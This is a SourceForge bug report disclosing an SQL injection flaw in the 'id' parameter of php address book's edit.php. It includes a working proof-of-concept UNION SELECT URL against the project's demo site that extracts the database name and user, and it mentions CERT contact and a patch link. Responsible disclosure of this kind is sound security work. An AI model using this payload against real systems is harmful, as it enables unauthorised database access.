Menu

#163 SQL Injection Vulnerability

V8.1.xx
open
chatelao
None
9
2015-09-21
2015-09-21
Rahul Pratap Singh
No

Hello,

I have found SQL Injection Vulnerability in php address book. Please, patch this bug/vulnerability before someone going to misuse it.

Description:
"id" field in edit.php is not properly sanitized, that leads to SQL Injection Vulnerability.

Proof of Concept
http://php-addressbook.sourceforge.net/demo/edit.php?id=null' union select 1,2,concat(0x3c2f7469746c653e,database(),0x3a,user(),0x3c62723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+

I am in contact with the CERT regarding the same and issued a tracking id.

Suggested patch:
http://blogs.msdn.com/b/brian_swan/archive/2010/03/04/what_2700_s-the-right-way-to-avoid-sql-injection-in-php-scripts_3f00_.aspx

With Kind Regards,
Rahul Pratap Singh

Discussion

Anonymous
Anonymous

Add attachments
Cancel





Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.